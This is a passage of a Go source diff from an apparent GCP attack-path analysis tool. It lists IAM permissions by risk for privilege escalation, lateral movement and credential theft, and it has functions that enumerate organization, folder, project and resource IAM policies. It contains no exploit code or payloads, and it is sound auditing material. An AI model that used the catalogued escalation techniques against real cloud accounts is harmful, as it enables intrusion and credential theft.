{Permission: "compute.firewalls.create", Category: "Network", RiskLevel: "HIGH", Description: "Create firewall rules to allow access"}, - {Permission: "compute.firewalls.update", Category: "Network", RiskLevel: "HIGH", Description: "Modify firewall rules to allow access"}, - {Permission: "compute.securityPolicies.update", Category: "Network", RiskLevel: "HIGH", Description: "Modify Cloud Armor policies"}, - - // IAP - {Permission: "iap.tunnelInstances.accessViaIAP", Category: "Network", RiskLevel: "MEDIUM", Description: "Access instances via IAP tunnel"}, - {Permission: "iap.tunnelDestGroups.accessViaIAP", Category: "Network", RiskLevel: "MEDIUM", Description: "Access resources via IAP tunnel"}, - } -} - -// GetPrivescPermissions returns permissions that enable privilege escalation -// Based on research from DataDog pathfinding.cloud AWS paths, mapped to GCP equivalents -func GetPrivescPermissions() []PrivescPermission { - return []PrivescPermission{ - // ========================================== - // SERVICE ACCOUNT IMPERSONATION - CRITICAL - // AWS equivalent: sts:AssumeRole - // ========================================== - {Permission: "iam.serviceAccounts.getAccessToken", Category: "SA Impersonation", RiskLevel: "CRITICAL", Description: "Generate access tokens for any SA (AWS: sts:AssumeRole)"}, - {Permission: "iam.serviceAccounts.signBlob", Category: "SA Impersonation", RiskLevel: "CRITICAL", Description: "Sign blobs as SA for GCS signed URLs or custom auth"}, - {Permission: "iam.serviceAccounts.signJwt", Category: "SA Impersonation", RiskLevel: "CRITICAL", Description: "Sign JWTs as SA for custom authentication flows"}, - {Permission: "iam.serviceAccounts.implicitDelegation", Category: "SA Impersonation", RiskLevel: "CRITICAL", Description: "Chain impersonation through intermediary SAs"}, - {Permission: "iam.serviceAccounts.getOpenIdToken", Category: "SA Impersonation", RiskLevel: "HIGH", Description: "Generate OIDC tokens for workload identity federation"}, - - // ========================================== - // KEY/CREDENTIAL CREATION - CRITICAL - // AWS equivalent: iam:CreateAccessKey - // ========================================== - {Permission: "iam.serviceAccountKeys.create", Category: "Key Creation", RiskLevel: "CRITICAL", Description: "Create persistent SA keys (AWS: iam:CreateAccessKey)"}, - {Permission: "iam.serviceAccountKeys.delete", Category: "Key Creation", RiskLevel: "HIGH", Description: "Delete existing keys to create new ones (bypass 10-key limit)"}, - {Permission: "storage.hmacKeys.create", Category: "Key Creation", RiskLevel: "HIGH", Description: "Create HMAC keys for S3-compatible access"}, - {Permission: "apikeys.keys.create", Category: "Key Creation", RiskLevel: "MEDIUM", Description: "Create API keys for service access"}, - - // ========================================== - // IAM POLICY MODIFICATION - CRITICAL - // AWS equivalent: iam:PutRolePolicy, iam:AttachRolePolicy, iam:CreatePolicyVersion - // ========================================== - {Permission: "resourcemanager.projects.setIamPolicy", Category: "IAM Modification", RiskLevel: "CRITICAL", Description: "Modify project IAM - grant any role to any principal"}, - {Permission: "resourcemanager.folders.setIamPolicy", Category: "IAM Modification", RiskLevel: "CRITICAL", Description: "Modify folder IAM - affects all child projects"}, - {Permission: "resourcemanager.organizations.setIamPolicy", Category: "IAM Modification", RiskLevel: "CRITICAL", Description: "Modify org IAM - affects entire organization"}, - {Permission: "iam.serviceAccounts.setIamPolicy", Category: "IAM Modification", RiskLevel: "CRITICAL", Description: "Grant impersonation access to service accounts"}, - {Permission: "iam.roles.update", Category: "IAM Modification", RiskLevel: "CRITICAL", Description: "Add permissions to custom roles (AWS: iam:CreatePolicyVersion)"}, - {Permission: "iam.roles.create", Category: "IAM Modification", RiskLevel: "HIGH", Description: "Create custom roles with dangerous permissions"}, - {Permission: "iam.roles.delete", Category: "IAM Modification", RiskLevel: "MEDIUM", Description: "Delete roles to disrupt access controls"}, - - // Resource-level IAM Modification - {Permission: "storage.buckets.setIamPolicy", Category: "IAM Modification", RiskLevel: "HIGH", Description: "Grant access to storage buckets"}, - {Permission: "pubsub.topics.setIamPolicy", Category: "IAM Modification", RiskLevel: "HIGH", Description: "Grant access to Pub/Sub topics"}, - {Permission: "pubsub.subscriptions.setIamPolicy", Category: "IAM Modification", RiskLevel: "HIGH", Description: "Grant access to Pub/Sub subscriptions"}, - {Permission: "bigquery.datasets.setIamPolicy", Category: "IAM Modification", RiskLevel: "HIGH", Description: "Grant access to BigQuery datasets"}, - {Permission: "artifactregistry.repositories.setIamPolicy", Category: "IAM Modification", RiskLevel: "HIGH", Description: "Grant access to container/artifact registries"}, - {Permission: "compute.instances.setIamPolicy", Category: "IAM Modification", RiskLevel: "HIGH", Description: "Grant OS Login access to instances"}, - {Permission: "compute.images.setIamPolicy", Category: "IAM Modification", RiskLevel: "HIGH", Description: "Share VM images with external projects"}, - {Permission: "compute.snapshots.setIamPolicy", Category: "IAM Modification", RiskLevel: "HIGH", Description: "Share disk snapshots with external projects"}, - {Permission: "kms.cryptoKeys.setIamPolicy", Category: "IAM Modification", RiskLevel: "HIGH", Description: "Grant access to encryption keys"}, - - // ========================================== - // COMPUTE + SA USAGE (PassRole equivalent) - // AWS equivalent: iam:PassRole + ec2:RunInstances - // ========================================== - {Permission: "compute.instances.create", Category: "Compute", RiskLevel: "HIGH", Description: "Create VMs with attached SA (AWS: PassRole+RunInstances)"}, - {Permission: "compute.instances.setServiceAccount", Category: "Compute", RiskLevel: "HIGH", Description: "Change instance SA to escalate privileges"}, - {Permission: "compute.instances.setMetadata", Category: "Compute", RiskLevel: "HIGH", Description: "Inject SSH keys or startup scripts"}, - {Permission: "compute.projects.setCommonInstanceMetadata", Category: "Compute", RiskLevel: "CRITICAL", Description: "Inject SSH keys project-wide"}, - {Permission: "compute.instances.osLogin", Category: "Compute", RiskLevel: "MEDIUM", Description: "SSH access via OS Login (AWS: ssm:StartSession)"}, - {Permission: "compute.instances.osAdminLogin", Category: "Compute", RiskLevel: "HIGH", Description: "SSH with sudo via OS Login"}, - {Permission: "compute.instanceTemplates.create", Category: "Compute", RiskLevel: "HIGH", Description: "Create templates with SA for MIG exploitation"}, - - // ========================================== - // SERVERLESS + SA USAGE (PassRole equivalent) - // AWS equivalent: iam:PassRole + lambda:CreateFunction - // ========================================== - {Permission: "cloudfunctions.functions.create", Category: "Serverless", RiskLevel: "HIGH", Description: "Deploy functions with SA (AWS: PassRole+Lambda)"}, - {Permission: "cloudfunctions.functions.update", Category: "Serverless", RiskLevel: "HIGH", Description: "Modify function code or SA"}, - {Permission: "cloudfunctions.functions.sourceCodeSet", Category: "Serverless", RiskLevel: "HIGH", Description: "Replace function source code"}, - {Permission: "cloudfunctions.functions.setIamPolicy", Category: "Serverless", RiskLevel: "HIGH", Description: "Make functions publicly invocable"}, - - // Cloud Run (AWS: ECS/Fargate equivalent) - {Permission: "run.services.create", Category: "Serverless", RiskLevel: "HIGH", Description: "Deploy services with SA (AWS: PassRole+ECS)"}, - {Permission: "run.services.update", Category: "Serverless", RiskLevel: "HIGH", Description: "Modify service image or SA"}, - {Permission: "run.services.setIamPolicy", Category: "Serverless", RiskLevel: "HIGH", Description: "Make services publicly accessible"}, - {Permission: "run.jobs.create", Category: "Serverless", RiskLevel: "HIGH", Description: "Create jobs with SA identity"}, - {Permission: "run.jobs.update", Category: "Serverless", RiskLevel: "HIGH", Description: "Modify job configuration or SA"}, - {Permission: "run.jobs.run", Category: "Serverless", RiskLevel: "HIGH", Description: "Execute jobs with attached SA"}, - - // ========================================== - // DATA PROCESSING + SA USAGE (PassRole equivalent) - // AWS equivalent: iam:PassRole + glue:CreateDevEndpoint, datapipeline:* - // ========================================== - {Permission: "dataproc.clusters.create", Category: "Data Processing", RiskLevel: "HIGH", Description: "Create Dataproc with SA (AWS: PassRole+Glue)"}, - {Permission: "dataproc.clusters.update", Category: "Data Processing", RiskLevel: "HIGH", Description: "Modify cluster SA or configuration"}, - {Permission: "dataproc.jobs.create", Category: "Data Processing", RiskLevel: "HIGH", Description: "Submit jobs to clusters"}, - {Permission: "dataproc.jobs.update", Category: "Data Processing", RiskLevel: "HIGH", Description: "Modify running jobs"}, - {Permission: "dataflow.jobs.create", Category: "Data Processing", RiskLevel: "HIGH", Description: "Create Dataflow jobs with SA (AWS: DataPipeline)"}, - {Permission: "dataflow.jobs.update", Category: "Data Processing", RiskLevel: "HIGH", Description: "Modify Dataflow job configuration"}, - - // ========================================== - // ML/AI PLATFORMS + SA USAGE - // AWS equivalent: iam:PassRole + sagemaker:CreateNotebookInstance - // ========================================== - {Permission: "notebooks.instances.create", Category: "AI/ML", RiskLevel: "HIGH", Description: "Create Vertex AI Workbench with SA (AWS: PassRole+SageMaker)"}, - {Permission: "notebooks.instances.update", Category: "AI/ML", RiskLevel: "HIGH", Description: "Modify notebook SA or configuration"}, - {Permission: "notebooks.instances.setIamPolicy", Category: "AI/ML", RiskLevel: "HIGH", Description: "Grant access to notebook instances"}, - {Permission: "aiplatform.customJobs.create", Category: "AI/ML", RiskLevel: "HIGH", Description: "Run custom training jobs with SA"}, - {Permission: "aiplatform.pipelineJobs.create", Category: "AI/ML", RiskLevel: "HIGH", Description: "Create ML pipelines with SA"}, - - // ========================================== - // ORCHESTRATION (Composer = AWS equivalent of Step Functions/MWAA) - // ========================================== - {Permission: "composer.environments.create", Category: "Orchestration", RiskLevel: "CRITICAL", Description: "Create Composer/Airflow with SA"}, - {Permission: "composer.environments.update", Category: "Orchestration", RiskLevel: "CRITICAL", Description: "Modify Composer environment SA"}, - - // Cloud Scheduler (AWS: EventBridge/CloudWatch Events) - {Permission: "cloudscheduler.jobs.create", Category: "Orchestration", RiskLevel: "HIGH", Description: "Create scheduled jobs with SA"}, - {Permission: "cloudscheduler.jobs.update", Category: "Orchestration", RiskLevel: "HIGH", Description: "Modify scheduled job SA or target"}, - - // Cloud Tasks (AWS: SQS + Lambda triggers) - {Permission: "cloudtasks.tasks.create", Category: "Orchestration", RiskLevel: "HIGH", Description: "Create tasks with SA for HTTP targets"}, - {Permission: "cloudtasks.queues.create", Category: "Orchestration", RiskLevel: "MEDIUM", Description: "Create task queues"}, - - // ========================================== - // CI/CD (Cloud Build = AWS CodeBuild) - // AWS equivalent: iam:PassRole + codebuild:CreateProject - // ========================================== - {Permission: "cloudbuild.builds.create", Category: "CI/CD", RiskLevel: "CRITICAL", Description: "Run builds with Cloud Build SA (AWS: PassRole+CodeBuild)"}, - {Permission: "cloudbuild.builds.update", Category: "CI/CD", RiskLevel: "HIGH", Description: "Modify build configuration"}, - {Permission: "source.repos.update", Category: "CI/CD", RiskLevel: "HIGH", Description: "Modify source repositories for build injection"}, - - // ========================================== - // INFRASTRUCTURE AS CODE - // AWS equivalent: iam:PassRole + cloudformation:CreateStack - // ========================================== - {Permission: "deploymentmanager.deployments.create", Category: "IaC", RiskLevel: "CRITICAL", Description: "Deploy infra with DM SA (AWS: PassRole+CloudFormation)"}, - {Permission: "deploymentmanager.deployments.update", Category: "IaC", RiskLevel: "HIGH", Description: "Modify deployment templates"}, - - // ========================================== - // KUBERNETES/GKE - // AWS equivalent: eks:* permissions - // ========================================== - {Permission: "container.clusters.create", Category: "GKE", RiskLevel: "HIGH", Description: "Create GKE clusters with node SA"}, - {Permission: "container.clusters.update", Category: "GKE", RiskLevel: "HIGH", Description: "Modify cluster node SA or config"}, - {Permission: "container.clusters.getCredentials", Category: "GKE", RiskLevel: "HIGH", Description: "Get cluster credentials"}, - {Permission: "container.pods.create", Category: "GKE", RiskLevel: "HIGH", Description: "Deploy pods with SA"}, - {Permission: "container.pods.exec", Category: "GKE", RiskLevel: "HIGH", Description: "Exec into pods to steal credentials"}, - {Permission: "container.secrets.get", Category: "GKE", RiskLevel: "HIGH", Description: "Read Kubernetes secrets"}, - {Permission: "container.secrets.create", Category: "GKE", RiskLevel: "MEDIUM", Description: "Create K8s secrets for later access"}, - {Permission: "container.serviceAccounts.createToken", Category: "GKE", RiskLevel: "HIGH", Description: "Generate K8s SA tokens"}, - - // ========================================== - // SECRETS & CREDENTIAL ACCESS - // AWS equivalent: secretsmanager:GetSecretValue, ssm:GetParameter - // ========================================== - {Permission: "secretmanager.versions.access", Category: "Secrets", RiskLevel: "HIGH", Description: "Access secret values (credentials, API keys)"}, - {Permission: "secretmanager.secrets.setIamPolicy", Category: "Secrets", RiskLevel: "HIGH", Description: "Grant access to secrets"}, - {Permission: "secretmanager.secrets.create", Category: "Secrets", RiskLevel: "MEDIUM", Description: "Create secrets for persistence"}, - - // ========================================== - // WORKLOAD IDENTITY FEDERATION - // AWS equivalent: iam:CreateOpenIDConnectProvider, iam:CreateSAMLProvider - // ========================================== - {Permission: "iam.workloadIdentityPools.create", Category: "Federation", RiskLevel: "CRITICAL", Description: "Create pools for external identity access"}, - {Permission: "iam.workloadIdentityPools.update", Category: "Federation", RiskLevel: "HIGH", Description: "Modify pool configuration"}, - {Permission: "iam.workloadIdentityPoolProviders.create", Category: "Federation", RiskLevel: "CRITICAL", Description: "Create providers for external impersonation"}, - {Permission: "iam.workloadIdentityPoolProviders.update", Category: "Federation", RiskLevel: "HIGH", Description: "Modify provider configuration"}, - - // ========================================== - // ORG POLICIES & CONSTRAINTS - // AWS equivalent: organizations:* SCP modifications - // ========================================== - {Permission: "orgpolicy.policy.set", Category: "Org Policy", RiskLevel: "CRITICAL", Description: "Disable security constraints org-wide"}, - {Permission: "orgpolicy.constraints.list", Category: "Org Policy", RiskLevel: "LOW", Description: "Enumerate security constraints"}, - {Permission: "essentialcontacts.contacts.delete", Category: "Org Policy", RiskLevel: "MEDIUM", Description: "Remove security notification contacts"}, - - // ========================================== - // SERVICE ACCOUNT USAGE (Required for most PassRole equivalents) - // AWS equivalent: iam:PassRole - // ========================================== - {Permission: "iam.serviceAccounts.actAs", Category: "SA Usage", RiskLevel: "HIGH", Description: "Use SA for resource creation (AWS: iam:PassRole)"}, - - // ========================================== - // NETWORK ACCESS FOR LATERAL MOVEMENT - // AWS equivalent: ec2:CreateNetworkInterface, ec2:ModifyInstanceAttribute - // ========================================== - {Permission: "iap.tunnelInstances.accessViaIAP", Category: "Network Access", RiskLevel: "MEDIUM", Description: "Access instances via IAP tunnel"}, - {Permission: "compute.firewalls.create", Category: "Network Access", RiskLevel: "HIGH", Description: "Create firewall rules for access"}, - {Permission: "compute.firewalls.update", Category: "Network Access", RiskLevel: "HIGH", Description: "Modify firewall rules"}, - - // ========================================== - // BILLING & RESOURCE CREATION - // Could be used to exhaust quotas or create resources - // ========================================== - {Permission: "billing.accounts.getIamPolicy", Category: "Billing", RiskLevel: "LOW", Description: "View billing IAM for enumeration"}, - {Permission: "billing.accounts.setIamPolicy", Category: "Billing", RiskLevel: "HIGH", Description: "Grant billing access"}, - } -} - -// AnalyzeOrganizationAttackPaths analyzes org-level IAM for attack paths -func (s *AttackPathService) AnalyzeOrganizationAttackPaths(ctx context.Context, pathType string) ([]AttackPath, map[string]string, []string, error) { - var paths []AttackPath - orgNames := make(map[string]string) - var orgIDs []string - - // Create organizations client - var orgsClient *resourcemanager.OrganizationsClient - var err error - if s.session != nil { - orgsClient, err = resourcemanager.NewOrganizationsClient(ctx, s.session.GetClientOption()) - } else { - orgsClient, err = resourcemanager.NewOrganizationsClient(ctx) - } - if err != nil { - return nil, orgNames, orgIDs, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") - } - defer orgsClient.Close() - - // Get IAM service for role resolution - iamService, err := s.getIAMService(ctx) - if err != nil { - iamService = nil - } - - // Get permission maps based on path type - exfilPermMap, lateralPermMap, privescPermMap := s.getPermissionMaps(pathType) - - // Search for organizations - searchReq := &resourcemanagerpb.SearchOrganizationsRequest{} - it := orgsClient.SearchOrganizations(ctx, searchReq) - for { - org, err := it.Next() - if err == iterator.Done { - break - } - if err != nil { - break - } - - orgID := strings.TrimPrefix(org.Name, "organizations/") - orgNames[orgID] = org.DisplayName - orgIDs = append(orgIDs, orgID) - - // Get IAM policy for this organization - policy, err := orgsClient.GetIamPolicy(ctx, &iampb.GetIamPolicyRequest{ - Resource: org.Name, - }) - if err != nil { - continue - } - - // Analyze each binding - for _, binding := range policy.Bindings { - permissions := s.getRolePermissions(iamService, binding.Role, "") - for _, member := range binding.Members { - memberPaths := s.analyzePermissionsForAttackPaths( - member, binding.Role, permissions, "", - "organization", orgID, org.DisplayName, - pathType, exfilPermMap, lateralPermMap, privescPermMap, - ) - paths = append(paths, memberPaths...) - } - } - } - - return paths, orgNames, orgIDs, nil -} - -// AnalyzeFolderAttackPaths analyzes folder-level IAM for attack paths -func (s *AttackPathService) AnalyzeFolderAttackPaths(ctx context.Context, pathType string) ([]AttackPath, map[string]string, error) { - var paths []AttackPath - folderNames := make(map[string]string) - - // Create folders client - var foldersClient *resourcemanager.FoldersClient - var err error - if s.session != nil { - foldersClient, err = resourcemanager.NewFoldersClient(ctx, s.session.GetClientOption()) - } else { - foldersClient, err = resourcemanager.NewFoldersClient(ctx) - } - if err != nil { - return nil, folderNames, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") - } - defer foldersClient.Close() - - // Get IAM service for role resolution - iamService, err := s.getIAMService(ctx) - if err != nil { - iamService = nil - } - - // Get permission maps based on path type - exfilPermMap, lateralPermMap, privescPermMap := s.getPermissionMaps(pathType) - - // Search for folders - searchReq := &resourcemanagerpb.SearchFoldersRequest{} - it := foldersClient.SearchFolders(ctx, searchReq) - for { - folder, err := it.Next() - if err == iterator.Done { - break - } - if err != nil { - break - } - - folderID := strings.TrimPrefix(folder.Name, "folders/") - folderNames[folderID] = folder.DisplayName - - // Get IAM policy for this folder - policy, err := foldersClient.GetIamPolicy(ctx, &iampb.GetIamPolicyRequest{ - Resource: folder.Name, - }) - if err != nil { - continue - } - - // Analyze each binding - for _, binding := range policy.Bindings { - permissions := s.getRolePermissions(iamService, binding.Role, "") - for _, member := range binding.Members { - memberPaths := s.analyzePermissionsForAttackPaths( - member, binding.Role, permissions, "", - "folder", folderID, folder.DisplayName, - pathType, exfilPermMap, lateralPermMap, privescPermMap, - ) - paths = append(paths, memberPaths...) - } - } - } - - return paths, folderNames, nil -} - -// AnalyzeProjectAttackPaths analyzes project-level IAM for attack paths -func (s *AttackPathService) AnalyzeProjectAttackPaths(ctx context.Context, projectID, projectName, pathType string) ([]AttackPath, error) { - var paths []AttackPath - - // Get project IAM policy - crmService, err := s.getResourceManagerService(ctx) - if err != nil { - return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") - } - - policy, err := crmService.Projects.GetIamPolicy(projectID, &crmv1.GetIamPolicyRequest{}).Do() - if err != nil { - return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") - } - - // Get IAM service for role resolution - iamService, err := s.getIAMService(ctx) - if err != nil { - iamService = nil - } - - // Get permission maps based on path type - exfilPermMap, lateralPermMap, privescPermMap := s.getPermissionMaps(pathType) - - // Analyze each binding - for _, binding := range policy.Bindings { - if binding == nil { - continue - } - - permissions := s.getRolePermissions(iamService, binding.Role, projectID) - for _, member := range binding.Members { - memberPaths := s.analyzePermissionsForAttackPaths( - member, binding.Role, permissions, projectID, - "project", projectID, projectName, - pathType, exfilPermMap, lateralPermMap, privescPermMap, - ) - paths = append(paths, memberPaths...) - } - } - - return paths, nil -} - -// AnalyzeResourceAttackPaths analyzes resource-level IAM for attack paths -func (s *AttackPathService) AnalyzeResourceAttackPaths(ctx context.Context, projectID, pathType string) ([]AttackPath, error) { - var paths []AttackPath - - // Get permission maps based on path type - exfilPermMap, lateralPermMap, privescPermMap := s.getPermissionMaps(pathType) - - // Get IAM service for role resolution - iamService, err := s.getIAMService(ctx) - if err != nil { - iamService = nil - } - - // Analyze GCS bucket IAM policies - bucketPaths := s.analyzeBucketIAM(ctx, projectID, pathType, exfilPermMap, lateralPermMap, privescPermMap, iamService) - paths = append(paths, bucketPaths...) - - // Analyze BigQuery dataset IAM policies - bqPaths := s.analyzeBigQueryIAM(ctx, projectID, pathType, exfilPermMap, lateralPermMap, privescPermMap, iamService) - paths = append(paths, bqPaths...) - - // Analyze Service Account IAM policies - saPaths := s.analyzeServiceAccountIAM(ctx, projectID, pathType, exfilPermMap, lateralPermMap, privescPermMap, iamService) - paths = append(paths, saPaths...) - - // Analyze Compute resource IAM (images, snapshots) - computePaths := s.analyzeComputeResourceIAM(ctx, projectID, pathType, exfilPermMap, lateralPermMap, privescPermMap, iamService) - paths = append(paths, computePaths...) - - // Analyze Secret Manager IAM policies - secretPaths := s.analyzeSecretManagerIAM(ctx, projectID, pathType, exfilPermMap, lateralPermMap, privescPermMap, iamService) - paths = append(paths, secretPaths...) - - // Analyze Cloud Functions IAM policies - functionPaths := s.analyzeCloudFunctionsIAM(ctx, projectID, pathType, exfilPermMap, lateralPermMap, privescPermMap, iamService) - paths = append(paths, functionPaths...) - - // Analyze Cloud Run IAM policies - cloudRunPaths := s.analyzeCloudRunIAM(ctx, projectID, pathType, exfilPermMap, lateralPermMap, privescPermMap, iamService) - paths = append(paths, cloudRunPaths...) - - // Analyze KMS IAM policies - kmsPaths := s.analyzeKMSIAM(ctx, projectID, pathType, exfilPermMap, lateralPermMap, privescPermMap, iamService) - paths = append(paths, kmsPaths...) - - // Analyze Pub/Sub IAM policies - pubsubPaths := s.analyzePubSubIAM(ctx, projectID, pathType, exfilPermMap, lateralPermMap, privescPermMap, iamService) - paths = append(paths, pubsubPaths...) - - // Analyze Spanner IAM policies - spannerPaths := s.analyzeSpannerIAM(ctx, projectID, pathType, exfilPermMap, lateralPermMap, privescPermMap, iamService) - paths = append(paths, spannerPaths...) - - // Analyze Compute Instance IAM policies - instancePaths := s.analyzeComputeInstanceIAM(ctx, projectID, pathType, exfilPermMap, lateralPermMap, privescPermMap, iamService) - paths = append(paths, instancePaths...) - - return paths, nil -} - -// analyzeBucketIAM analyzes IAM policies on GCS buckets -func (s *AttackPathService) analyzeBucketIAM(ctx context.Context, projectID, pathType string, exfilPermMap map[string]DataExfilPermission, lateralPermMap map[string]LateralMovementPermission, privescPermMap map[string]PrivescPermission, iamService *iam.Service) []AttackPath { - var paths []AttackPath - - storageService, err := s.getStorageService(ctx) - if err != nil { - return paths - } - - // List buckets in the project - buckets, err := storageService.Buckets.List(projectID).Do() - if err != nil { - return paths - } - - for _, bucket := range buckets.Items { - // Get IAM policy for this bucket - policy, err := storageService.Buckets.GetIamPolicy(bucket.Name).Do() - if err != nil { - continue - } - - for _, binding := range policy.Bindings { - permissions := s.getRolePermissions(iamService, binding.Role, projectID) - for _, member := range binding.Members { - memberPaths := s.analyzePermissionsForAttackPaths( - member, binding.Role, permissions, projectID, - "resource", fmt.Sprintf("gs://%s", bucket.Name), bucket.Name, - pathType, exfilPermMap, lateralPermMap, privescPermMap, - ) - paths = append(paths, memberPaths...) - } - } - } - - return paths -} - -// analyzeBigQueryIAM analyzes IAM policies on BigQuery datasets -func (s *AttackPathService) analyzeBigQueryIAM(ctx context.Context, projectID, pathType string, exfilPermMap map[string]DataExfilPermission, lateralPermMap map[string]LateralMovementPermission, privescPermMap map[string]PrivescPermission, iamService *iam.Service) []AttackPath { - var paths []AttackPath - - bqService, err := s.getBigQueryService(ctx) - if err != nil { - return paths - } - - // List datasets in the project - datasets, err := bqService.Datasets.List(projectID).Do() - if err != nil { - return paths - } - - for _, dataset := range datasets.Datasets { - datasetID := dataset.DatasetReference.DatasetId - - // Get dataset to access IAM policy - ds, err := bqService.Datasets.Get(projectID, datasetID).Do() - if err != nil { - continue - } - - // BigQuery uses Access entries instead of standard IAM bindings - for _, access := range ds.Access { - member := "" - if access.UserByEmail != "" { - member = "user:" + access.UserByEmail - } else if access.GroupByEmail != "" { - member = "group:" + access.GroupByEmail - } else if access.SpecialGroup != "" { - member = access.SpecialGroup - } else if access.IamMember != "" { - member = access.IamMember - } - - if member == "" { - continue - } - - role := access.Role - permissions := s.getRolePermissions(iamService, "roles/bigquery."+strings.ToLower(role), projectID) - - memberPaths := s.analyzePermissionsForAttackPaths( - member, role, permissions, projectID, - "resource", fmt.Sprintf("%s:%s", projectID, datasetID), datasetID, - pathType, exfilPermMap, lateralPermMap, privescPermMap, - ) - paths = append(paths, memberPaths...) - } - } - - return paths -} - -// analyzeServiceAccountIAM analyzes IAM policies on service accounts -func (s *AttackPathService) analyzeServiceAccountIAM(ctx context.Context, projectID, pathType string, exfilPermMap map[string]DataExfilPermission, lateralPermMap map[string]LateralMovementPermission, privescPermMap map[string]PrivescPermission, iamService *iam.Service) []AttackPath { - var paths []AttackPath - - if iamService == nil { - var err error - iamService, err = s.getIAMService(ctx) - if err != nil { - return paths - } - } - - // List service accounts in the project - saList, err := iamService.Projects.ServiceAccounts.List("projects/" + projectID).Do() - if err != nil { - return paths - } - - for _, sa := range saList.Accounts { - // Get IAM policy for this service account - policy, err := iamService.Projects.ServiceAccounts.GetIamPolicy("projects/" + projectID + "/serviceAccounts/" + sa.Email).Do() - if err != nil { - continue - } - - for _, binding := range policy.Bindings { - permissions := s.getRolePermissions(iamService, binding.Role, projectID) - for _, member := range binding.Members { - memberPaths := s.analyzePermissionsForAttackPaths( - member, binding.Role, permissions, projectID, - "resource", sa.Email, sa.DisplayName, - pathType, exfilPermMap, lateralPermMap, privescPermMap, - ) - paths = append(paths, memberPaths...) - } - } - } - - return paths -} - -// analyzeComputeResourceIAM analyzes IAM policies on compute resources (images, snapshots) -func (s *AttackPathService) analyzeComputeResourceIAM(ctx context.Context, projectID, pathType string, exfilPermMap map[string]DataExfilPermission, lateralPermMap map[string]LateralMovementPermission, privescPermMap map[string]PrivescPermission, iamService *iam.Service) []AttackPath { - var paths []AttackPath - - computeService, err := s.getComputeService(ctx) - if err != nil { - return paths - } - - // Analyze images - images, err := computeService.Images.List(projectID).Do() - if err == nil { - for _, image := range images.Items { - policy, err := computeService.Images.GetIamPolicy(projectID, image.Name).Do() - if err != nil { - continue - } - - for _, binding := range policy.Bindings { - permissions := s.getRolePermissions(iamService, binding.Role, projectID) - for _, member := range binding.Members { - memberPaths := s.analyzePermissionsForAttackPaths( - member, binding.Role, permissions, projectID, - "resource", fmt.Sprintf("image/%s", image.Name), image.Name, - pathType, exfilPermMap, lateralPermMap, privescPermMap, - ) - paths = append(paths, memberPaths...) - } - } - } - } - - // Analyze snapshots - snapshots, err := computeService.Snapshots.List(projectID).Do() - if err == nil { - for _, snapshot := range snapshots.Items { - policy, err := computeService.Snapshots.GetIamPolicy(projectID, snapshot.Name).Do() - if err != nil { - continue - } - - for _, binding := range policy.Bindings { - permissions := s.getRolePermissions(iamService, binding.Role, projectID) - for _, member := range binding.Members { - memberPaths := s.analyzePermissionsForAttackPaths( - member, binding.Role, permissions, projectID, - "resource", fmt.Sprintf("snapshot/%s", snapshot.Name), snapshot.Name, - pathType, exfilPermMap, lateralPermMap, privescPermMap, - ) - paths = append(paths, memberPaths...) - } - } - } - } - - return paths -} - -// analyzeSecretManagerIAM analyzes IAM policies on Secret Manager secrets -func (s *AttackPathService) analyzeSecretManagerIAM(ctx context.Context, projectID, pathType string, exfilPermMap map[string]DataExfilPermission, lateralPermMap map[string]LateralMovementPermission, privescPermMap map[string]PrivescPermission, iamService *iam.Service) []AttackPath { - var paths []AttackPath - - smService, err := s.getSecretManagerService(ctx) - if err != nil { - return paths - } - - // List secrets in the project - parent := fmt.Sprintf("projects/%s", projectID) - secrets, err := smService.Projects.Secrets.List(parent).Do() - if err != nil { - return paths - } - - for _, secret := range secrets.Secrets { - // Get IAM policy for this secret - policy, err := smService.Projects.Secrets.GetIamPolicy(secret.Name).Do() - if err != nil { - continue - } - - secretName := secret.Name - // Extract just the secret name from the full path - parts := strings.Split(secret.Name, "/") - if len(parts) > 0 { - secretName = parts[len(parts)-1] - } - - for _, binding := range policy.Bindings { - permissions := s.getRolePermissions(iamService, binding.Role, projectID) - for _, member := range binding.Members { - memberPaths := s.analyzePermissionsForAttackPaths( - member, binding.Role, permissions, projectID, - "resource", fmt.Sprintf("secret/%s", secretName), secretName, - pathType, exfilPermMap, lateralPermMap, privescPermMap, - ) - paths = append(paths, memberPaths...) - } - } - } - - return paths -} - -// analyzeCloudFunctionsIAM analyzes IAM policies on Cloud Functions -func (s *AttackPathService) analyzeCloudFunctionsIAM(ctx context.Context, projectID, pathType string, exfilPermMap map[string]DataExfilPermission, lateralPermMap map[string]LateralMovementPermission, privescPermMap map[string]PrivescPermission, iamService *iam.Service) []AttackPath { - var paths []AttackPath - - cfService, err := s.getCloudFunctionsService(ctx) - if err != nil { - return paths - } - - // List functions in the project (all locations) - parent := fmt.Sprintf("projects/%s/locations/-", projectID) - functions, err := cfService.Projects.Locations.Functions.List(parent).Do() - if err != nil { - return paths - } - - for _, fn := range functions.Functions { - // Get IAM policy for this function - policy, err := cfService.Projects.Locations.Functions.GetIamPolicy(fn.Name).Do() - if err != nil { - continue - } - - fnName := fn.Name - // Extract just the function name from the full path - parts := strings.Split(fn.Name, "/") - if len(parts) > 0 { - fnName = parts[len(parts)-1] - } - - for _, binding := range policy.Bindings { - permissions := s.getRolePermissions(iamService, binding.Role, projectID) - for _, member := range binding.Members { - memberPaths := s.analyzePermissionsForAttackPaths( - member, binding.Role, permissions, projectID, - "resource", fmt.Sprintf("function/%s", fnName), fnName, - pathType, exfilPermMap, lateralPermMap, privescPermMap, - ) - paths = append(paths, memberPaths...) - } - } - } - - return paths -} - -// analyzeCloudRunIAM analyzes IAM policies on Cloud Run services -func (s *AttackPathService) analyzeCloudRunIAM(ctx context.Context, projectID, pathType string, exfilPermMap map[string]DataExfilPermission, lateralPermMap map[string]LateralMovementPermission, privescPermMap map[string]PrivescPermission, iamService *iam.Service) []AttackPath { - var paths []AttackPath - - runService, err := s.getCloudRunService(ctx) - if err != nil { - return paths - } - - // List services in the project (all locations) - parent := fmt.Sprintf("projects/%s/locations/-", projectID) - services, err := runService.Projects.Locations.Services.List(parent).Do() - if err == nil { - for _, svc := range services.Items { - // Get IAM policy for this service - policy, err := runService.Projects.Locations.Services.GetIamPolicy(svc.Metadata.Name).Do() - if err != nil { - continue - } - - svcName := svc.Metadata.Name - // Extract just the 